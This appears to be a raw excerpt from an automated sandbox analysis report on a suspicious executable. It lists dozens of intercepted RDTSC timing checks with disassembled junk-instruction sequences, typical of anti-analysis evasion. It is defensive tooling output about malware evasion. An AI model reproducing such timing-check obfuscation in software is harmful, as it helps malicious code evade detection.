              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8BB9 second address: DC8BC7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8BC7 second address: DC8BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F99A0E9ACE6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCD5F8 second address: DCD5FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A347 second address: D6A368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F99A0E9ACF9h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD1FED second address: DD1FF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD17E0 second address: DD17E5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD1A56 second address: DD1A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pushad 0x00000009 jns 00007F99A1050D6Ah 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F99A1050D6Dh 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD1BD5 second address: DD1BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD1BD9 second address: DD1BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD1BDD second address: DD1BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F99A0E9ACEEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD75B7 second address: DD75DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A1050D6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F99A1050D6Fh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD76A3 second address: DD76B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A0E9ACEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72717 second address: D7271C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC6AC second address: DDC6C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F99A0E9ACEEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC7F5 second address: DDC7F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC7F9 second address: DDC808 instructions: 0x00000000 rdtsc 0x00000002 js 00007F99A0E9ACE6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDCAE0 second address: DDCAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDCAE5 second address: DDCAEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD060 second address: DDD0D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F99A1050D66h 0x0000000a pushad 0x0000000b popad 0x0000000c jnc 00007F99A1050D66h 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F99A1050D70h 0x0000001b popad 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f jns 00007F99A1050D66h 0x00000025 jnp 00007F99A1050D66h 0x0000002b push eax 0x0000002c pop eax 0x0000002d popad 0x0000002e popad 0x0000002f pushad 0x00000030 jns 00007F99A1050D82h 0x00000036 jno 00007F99A1050D6Ch 0x0000003c jg 00007F99A1050D72h 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD0D1 second address: DDD0D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD209 second address: DDD20D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2BE8 second address: DE2C22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A0E9ACF8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007F99A0E9ACFCh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2C22 second address: DE2C29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2C29 second address: DE2C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2C37 second address: DE2C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F99A1050D66h 0x0000000a jng 00007F99A1050D66h 0x00000010 popad 0x00000011 jp 00007F99A1050D68h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2C50 second address: DE2C56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2C56 second address: DE2C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F99A1050D66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2C60 second address: DE2C6A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F99A0E9ACE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE1CF1 second address: DE1CF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE1CF5 second address: DE1CF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE219A second address: DE21A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE256E second address: DE2585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F99A0E9ACE6h 0x0000000a je 00007F99A0E9ACE6h 0x00000010 popad 0x00000011 pop ebx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2585 second address: DE2589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2A80 second address: DE2A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A0E9ACF6h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6BD58 second address: D6BD5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6BD5C second address: D6BD60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7107 second address: DE712E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A1050D71h 0x00000007 jmp 00007F99A1050D6Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7E5A second address: DE7E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7E5F second address: DE7E78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A1050D6Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F99A1050D66h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEE5BE second address: DEE5C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF41D1 second address: DF41D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB051D second address: DB0523 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0523 second address: DB0527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB11C8 second address: DB11D2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99A0E9ACE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB11D2 second address: DB11FD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F99A1050D68h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F99A1050D7Ch 0x00000013 jmp 00007F99A1050D76h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB11FD second address: DB120C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99A0E9ACEBh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB12BC second address: DB12C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB12C2 second address: D97560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F99A0E9ACE8h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov ecx, 25B33900h 0x00000028 call dword ptr [ebp+122D1DB2h] 0x0000002e push eax 0x0000002f push edx 0x00000030 ja 00007F99A0E9ACFCh 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF33D7 second address: DF33DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF33DB second address: DF33E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF33E7 second address: DF33EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF360C second address: DF364B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F99A0E9ACECh 0x0000000d popad 0x0000000e pushad 0x0000000f push ecx 0x00000010 jg 00007F99A0E9ACE6h 0x00000016 pop ecx 0x00000017 pushad 0x00000018 jl 00007F99A0E9ACE6h 0x0000001e push esi 0x0000001f pop esi 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 jmp 00007F99A0E9ACF1h 0x00000028 push eax 0x00000029 push edx 0x0000002a push edx 0x0000002b pop edx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF364B second address: DF3661 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A1050D72h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF37A0 second address: DF37A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3C3C second address: DF3C70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F99A1050D66h 0x0000000b jp 00007F99A1050D66h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jnl 00007F99A1050D86h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F99A1050D78h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3DAC second address: DF3DC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A0E9ACF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3DC3 second address: DF3DD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99A1050D6Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3DD4 second address: DF3DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF64E0 second address: DF64E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E00974 second address: E00978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF276 second address: DFF27A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF27A second address: DFF28C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF3D8 second address: DFF3DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF3DC second address: DFF3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF839 second address: DFF83F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF83F second address: DFF848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF99B second address: DFF9A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF9A3 second address: DFF9B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F99A0E9ACE6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F99A0E9ACE6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF9B8 second address: DFF9E7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F99A1050D66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F99A1050D6Dh 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F99A1050D6Fh 0x00000019 pop edx 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0065A second address: E0065E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0065E second address: E00662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E047A7 second address: E047DC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jc 00007F99A0E9ACE6h 0x00000009 je 00007F99A0E9ACE6h 0x0000000f pop edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F99A0E9ACECh 0x00000018 jp 00007F99A0E9ACE6h 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 push ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F99A0E9ACEAh 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E047DC second address: E047EC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007F99A1050D66h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E03D8D second address: E03D9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 je 00007F99A0E9ACE6h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E03D9C second address: E03DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E03EC0 second address: E03ECA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F99A0E9ACE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E03ECA second address: E03EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F99A1050D66h 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0405E second address: E04078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A0E9ACF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E04078 second address: E0409B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99A1050D6Ah 0x00000009 jmp 00007F99A1050D75h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E041ED second address: E041F6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E041F6 second address: E0420D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F99A1050D6Ch 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0420D second address: E04212 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E04212 second address: E04235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A1050D76h 0x00000009 pop esi 0x0000000a jl 00007F99A1050D7Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0438A second address: E0438E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0438E second address: E04394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E077D1 second address: E077D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E06EDA second address: E06EDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E06EDE second address: E06EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F99A0E9ACF1h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop ecx 0x0000000f pop ecx 0x00000010 push edx 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0706E second address: E07074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07074 second address: E0707A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E071C1 second address: E071CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E071CB second address: E071CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0749E second address: E074CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F99A1050D76h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jno 00007F99A1050D66h 0x00000012 pop esi 0x00000013 jc 00007F99A1050D6Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DB79 second address: E0DB7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DB7D second address: E0DB89 instructions: 0x00000000 rdtsc 0x00000002 je 00007F99A1050D66h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E55A second address: E0E588 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A0E9ACEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F99A0E9ACF9h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0F424 second address: E0F428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0F428 second address: E0F42E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
